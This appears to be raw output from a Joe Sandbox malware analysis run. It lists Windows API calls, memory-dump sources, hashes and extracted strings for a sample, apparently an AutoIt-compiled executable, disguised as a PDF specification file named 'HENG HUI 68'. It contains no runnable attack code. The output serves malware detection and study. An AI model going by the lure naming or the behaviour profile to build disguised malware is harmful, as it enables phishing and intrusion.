                                      • CloseHandle.KERNEL32(00000000), ref: 0038D20A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                      • String ID: :$\$\??\%s
                                      • API String ID: 3827137101-3457252023
                                      • Opcode ID: c29a72df4866b2cbe0bcd2b48e7f3abfa8bf2a94ab7c94962b3827da28a769a0
                                      • Instruction ID: 08d7ff3aceab59db7950d217cadac2e0f1cccbba81460fc2d327d4493d3b0300
                                      • Opcode Fuzzy Hash: c29a72df4866b2cbe0bcd2b48e7f3abfa8bf2a94ab7c94962b3827da28a769a0
                                      • Instruction Fuzzy Hash: 8831B476500209ABDB22EFA0DC49FEB77BDEF88740F1040B5F509D61A0E770E6448B24
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0039034B
                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003903DE
                                      • SHGetDesktopFolder.SHELL32(?), ref: 003903F2
                                      • CoCreateInstance.OLE32(003CDA8C,00000000,00000001,003F3CF8,?), ref: 0039043E
                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003904AD
                                      • CoTaskMemFree.OLE32(?,?), ref: 00390505
                                      • SHBrowseForFolderW.SHELL32(?), ref: 0039057E
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003905A1
                                      • CoTaskMemFree.OLE32(00000000), ref: 003905A8
                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003905DF
                                      • CoUninitialize.OLE32(00000001,00000000), ref: 003905E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                      • String ID:
                                      • API String ID: 2762341140-0
                                      • Opcode ID: df8c7824f7c6f7b8598da2345ce21b24b774a6b0adab5c8af70a209b36a4f58e
                                      • Instruction ID: f72dcdaa8a45a9fa24cc5f4555f6eede39f270f6f0a4886688de0905a691017e
                                      • Opcode Fuzzy Hash: df8c7824f7c6f7b8598da2345ce21b24b774a6b0adab5c8af70a209b36a4f58e
                                      • Instruction Fuzzy Hash: E9B1D875A00209AFDB05DFA4C889DAEBBB9FF49304B1584A9F905EB251DB70EE41CF50
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 003794FE
                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00379549
                                      • VariantInit.OLEAUT32(?), ref: 0037955B
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 0037957B
                                      • VariantCopy.OLEAUT32(?,?), ref: 003795BE
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 003795D2
                                      • VariantClear.OLEAUT32(?), ref: 003795E7
                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 003795F4
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003795FD
                                      • VariantClear.OLEAUT32(?), ref: 0037960F
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0037961A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      • Opcode ID: 51b2281123476c38b7c52076589bf53c7b93a57dbb4bb1d5110406138640466a
                                      • Instruction ID: b338a3304f8b71b133b9f1c2ceb4d15b8eec425c4d374ff84724a7bad3bf2261
                                      • Opcode Fuzzy Hash: 51b2281123476c38b7c52076589bf53c7b93a57dbb4bb1d5110406138640466a
                                      • Instruction Fuzzy Hash: BA413231900219AFCB16EFA5D844DDEBB79FF08355F008165F505E7261DB35EA45CBA0
                                      APIs
                                        • Part of subcall function 0035E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0034C8B7,?,00002000,?,?,00000000,?,0034419E,?,?,?,003DDC00), ref: 0035E984
                                        • Part of subcall function 0034660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003453B1,?,?,003461FF,?,00000000,00000001,00000000), ref: 0034662F
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0034C978
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0034CABE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$FullNamePath
                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                      • API String ID: 1801377286-1018226102
                                      • Opcode ID: 8aacbd06c980f1a33850b3cfaa88f43cc4a267cb352a0fed5efaf6b46124836b
                                      • Instruction ID: 2d3abcfc1a530c2cccd2077b6643a34c49ca3d99964cf7595693e0e1e50c7208
                                      • Opcode Fuzzy Hash: 8aacbd06c980f1a33850b3cfaa88f43cc4a267cb352a0fed5efaf6b46124836b
                                      • Instruction Fuzzy Hash: 461283715083419FC726EF24C841AAFBBE5FF99304F44492DF5899B261DB30EA49CB52
                                      APIs
                                      • CoInitialize.OLE32 ref: 0039ADF6
                                      • CoUninitialize.OLE32 ref: 0039AE01
                                      • CoCreateInstance.OLE32(?,00000000,00000017,003CD8FC,?), ref: 0039AE61
                                      • IIDFromString.OLE32(?,?), ref: 0039AED4
                                      • VariantInit.OLEAUT32(?), ref: 0039AF6E
                                      • VariantClear.OLEAUT32(?), ref: 0039AFCF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                      • API String ID: 636576611-1287834457
                                      • Opcode ID: 0265543cc77406468d9eba598f45a234c4c53a59eb37d2e0c49ebf756876f6e7
                                      • Instruction ID: aae4e7ea496ac5973cc8621ceccf1e6811080026b674f2cad127ac2accde5473
                                      • Opcode Fuzzy Hash: 0265543cc77406468d9eba598f45a234c4c53a59eb37d2e0c49ebf756876f6e7
                                      • Instruction Fuzzy Hash: 5D618D71608B11AFDB12EF54C848B6BB7E8AF85714F104619F9869B291C770ED48CBD3
                                      APIs
                                      • CharLowerBuffW.USER32(003DDC00,003DDC00,003DDC00), ref: 0038D7CE
                                      • GetDriveTypeW.KERNEL32(?,003F3A70,00000061), ref: 0038D898
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BuffCharDriveLowerType
                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 2426244813-1000479233
                                      • Opcode ID: 9a6b329c9a36460f638d5eabe0b020b3cec59d4355bb6ab3f0a9e16b994daa62
                                      • Instruction ID: 8648b029220d2f3f86706916a2899ce7066e12882fc6b447143395b7ebeae0dd
                                      • Opcode Fuzzy Hash: 9a6b329c9a36460f638d5eabe0b020b3cec59d4355bb6ab3f0a9e16b994daa62
                                      • Instruction Fuzzy Hash: B35160351043049FC716FF14D891EAAB7A5EF85314F10896DF99A5B2E2DB31EE09CB42
                                      APIs
                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00386CFB
                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00386D21
                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00386D97
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: FileInfoVersion$QuerySizeValue
                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                      • API String ID: 2179348866-1459072770
                                      • Opcode ID: f27af5bf6fbc1a547af7ea38111fb139008f06cc74f33db42f682cc490936ed4
                                      • Instruction ID: aac4c53b636205987011da20e137577cd0431fc89b753d16b6fd2fc9ba18450b
                                      • Opcode Fuzzy Hash: f27af5bf6fbc1a547af7ea38111fb139008f06cc74f33db42f682cc490936ed4
                                      • Instruction Fuzzy Hash: 14410572600204BBEB13BB64CD43EBF77BCDF41310F04406AF901EA192EB74AA0497A1
                                      APIs
                                      • WSAStartup.WSOCK32(00000101,?), ref: 00398168
                                      • inet_addr.WSOCK32(?,?,?), ref: 003981AD
                                      • gethostbyname.WSOCK32(?), ref: 003981B9
                                      • IcmpCreateFile.IPHLPAPI ref: 003981C7
                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00398237
                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0039824D
                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 003982C2
                                      • WSACleanup.WSOCK32 ref: 003982C8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                      • String ID: Ping
                                      • API String ID: 1028309954-2246546115
                                      • Opcode ID: 75552721561b5fe304bf5d3300647f5fac84e690563338a62837a281ab8e7be9
                                      • Instruction ID: 4f8072622970bd81512a563cc2a5eb9cceadf3111dc63f91a242b99c16ba6b79
                                      • Opcode Fuzzy Hash: 75552721561b5fe304bf5d3300647f5fac84e690563338a62837a281ab8e7be9
                                      • Instruction Fuzzy Hash: A151A3316047009FDB12AF24CC45F2AB7E8EF89710F044969FA96DB2A1DB70ED05CB41
                                      APIs
                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 00386834
                                      • LoadResource.KERNEL32(?,00000000), ref: 00386840
                                      • LockResource.KERNEL32(00000000), ref: 0038684D
                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 0038686D
                                      • LoadResource.KERNEL32(?,00000000), ref: 0038687F
                                      • SizeofResource.KERNEL32(?,00000000), ref: 0038688E
                                      • LockResource.KERNEL32(?), ref: 0038689A
                                      • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003868F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLock$CreateFromIconSizeof
                                      • String ID: 5?
                                      • API String ID: 2263570339-4033248023
                                      • Opcode ID: 2213efa76d9335e8ac4805583876b3681709d39251a2085326b969de9fa6dd4a
                                      • Instruction ID: 51a8e0c9e1e1376f81e49eb8a556e714b21f0e68bfef4f14879ff4762fefac8b
                                      • Opcode Fuzzy Hash: 2213efa76d9335e8ac4805583876b3681709d39251a2085326b969de9fa6dd4a
                                      • Instruction Fuzzy Hash: 313170B190021AABDB12AF60DD46EBFBBACEF08340F008865F906E6150E734E951DB64
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0038E396
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0038E40C
                                      • GetLastError.KERNEL32 ref: 0038E416
                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0038E483
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      • Opcode ID: a4cc1cd035be7ac2b4d66974f9969bf6e6536db0fa926171ae642cd3743650dc
                                      • Instruction ID: 3072312b8407c5aeda912145b0dd692ef36f72ae936478513b600388d63a3cd0
                                      • Opcode Fuzzy Hash: a4cc1cd035be7ac2b4d66974f9969bf6e6536db0fa926171ae642cd3743650dc
                                      • Instruction Fuzzy Hash: A7316135A003099FDB03EF65C845EBEB7B8EF45304F1580A5F60AEB291DB70AA01C791
                                      APIs
                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0037B98C
                                      • GetDlgCtrlID.USER32 ref: 0037B997
                                      • GetParent.USER32 ref: 0037B9B3
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0037B9B6
                                      • GetDlgCtrlID.USER32(?), ref: 0037B9BF
                                      • GetParent.USER32(?), ref: 0037B9DB
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0037B9DE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$CtrlParent
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1383977212-1403004172
                                      • Opcode ID: 4b9d29d69c9df2be7b5237759b0b1ca4fb98d755919aa7ffac24673b4296e1fa
                                      • Instruction ID: 03e37f6629e0373f45f9e0a1007a6e04792714ff8ac0730121dd480ca243beef
                                      • Opcode Fuzzy Hash: 4b9d29d69c9df2be7b5237759b0b1ca4fb98d755919aa7ffac24673b4296e1fa
                                      • Instruction Fuzzy Hash: A721B675900108BFDF06ABA4CC85EFEBBB9EF46310F504119F665972E1DB786825DB20
                                      APIs
                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0037BA73
                                      • GetDlgCtrlID.USER32 ref: 0037BA7E
                                      • GetParent.USER32 ref: 0037BA9A
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0037BA9D
                                      • GetDlgCtrlID.USER32(?), ref: 0037BAA6
                                      • GetParent.USER32(?), ref: 0037BAC2
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0037BAC5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$CtrlParent
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1383977212-1403004172
                                      • Opcode ID: 31256d9169739137f32a2e54d2b82be0ea53bca2e3db556085af6ae6fad85d28
                                      • Instruction ID: 2fb1f237e8cc8a8156d48e39e6f6677acb3b4b071bbbd4440fa7bfd37e31caf7
                                      • Opcode Fuzzy Hash: 31256d9169739137f32a2e54d2b82be0ea53bca2e3db556085af6ae6fad85d28
                                      • Instruction Fuzzy Hash: 5921C574900108BFDF52AB64CC85FFEBBB9EF45300F504015F955AB1A1DB796926DB20
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0039B2D5
                                      • CoInitialize.OLE32(00000000), ref: 0039B302
                                      • CoUninitialize.OLE32 ref: 0039B30C
                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 0039B40C
                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 0039B539
                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0039B56D
                                      • CoGetObject.OLE32(?,00000000,003CD91C,?), ref: 0039B590
                                      • SetErrorMode.KERNEL32(00000000), ref: 0039B5A3
                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0039B623
                                      • VariantClear.OLEAUT32(003CD91C), ref: 0039B633
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                      • String ID:
                                      • API String ID: 2395222682-0
                                      • Opcode ID: e37a87ea73b5d0f0cbea53ce83e804b6fc5b2b85e8a8a608f067330beb236986
                                      • Instruction ID: b872604f87b7b68e653e62c3ff72bc808b18b3cd22d5c024c06f37fcdc284613
                                      • Opcode Fuzzy Hash: e37a87ea73b5d0f0cbea53ce83e804b6fc5b2b85e8a8a608f067330beb236986
                                      • Instruction Fuzzy Hash: A6C12271608301AFCB02DF69D984A2BB7E9BF89308F00491DF98ADB251DB71ED05CB52
                                      APIs
                                      • GetMenuItemInfoW.USER32(00401708,000000FF,00000000,00000030), ref: 00384E59
                                      • SetMenuItemInfoW.USER32(00401708,00000004,00000000,00000030), ref: 00384E8F
                                      • Sleep.KERNEL32(000001F4), ref: 00384EA1
                                      • GetMenuItemCount.USER32(?), ref: 00384EE5
                                      • GetMenuItemID.USER32(?,00000000), ref: 00384F01
                                      • GetMenuItemID.USER32(?,-00000001), ref: 00384F2B
                                      • GetMenuItemID.USER32(?,?), ref: 00384F70
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00384FB6
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00384FCA
                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00384FEB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                      • String ID:
                                      • API String ID: 1460738036-0
                                      • Opcode ID: d378823e3cd1fed421390da5fe89ac28e2314a10667eaa8edc53291cced07b77
                                      • Instruction ID: f8eae1773cd51c497c208419a24b1ed9b175cb637c05b9dc00d02118686e2b56
                                      • Opcode Fuzzy Hash: d378823e3cd1fed421390da5fe89ac28e2314a10667eaa8edc53291cced07b77
                                      • Instruction Fuzzy Hash: C9619D7190038AAFDB22EFA4D988EAEBBB8FB05308F15009DF541E7651D770AD05CB20
                                      APIs
                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003A9C98
                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003A9C9B
                                      • GetWindowLongW.USER32(?,000000F0), ref: 003A9CBF
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003A9CE2
                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003A9D5A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow
                                      • String ID:
                                      • API String ID: 312131281-0
                                      • Opcode ID: 6fc7789e24b335bb0ff05f42007bafb5ade07a99e396b6ea2fe2016861b3e1a2
                                      • Instruction ID: 88c2a53fa2e5f4faf5a68c25983d6423f0ced4d6b8da4108986382003952bad3
                                      • Opcode Fuzzy Hash: 6fc7789e24b335bb0ff05f42007bafb5ade07a99e396b6ea2fe2016861b3e1a2
                                      • Instruction Fuzzy Hash: 05616C75900208AFDB12DFA8CC81FEEB7B8EB09714F14456AFA05EB2A1D774A941DB50
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00384047
                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003830A5,?,00000001), ref: 0038405B
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00384062
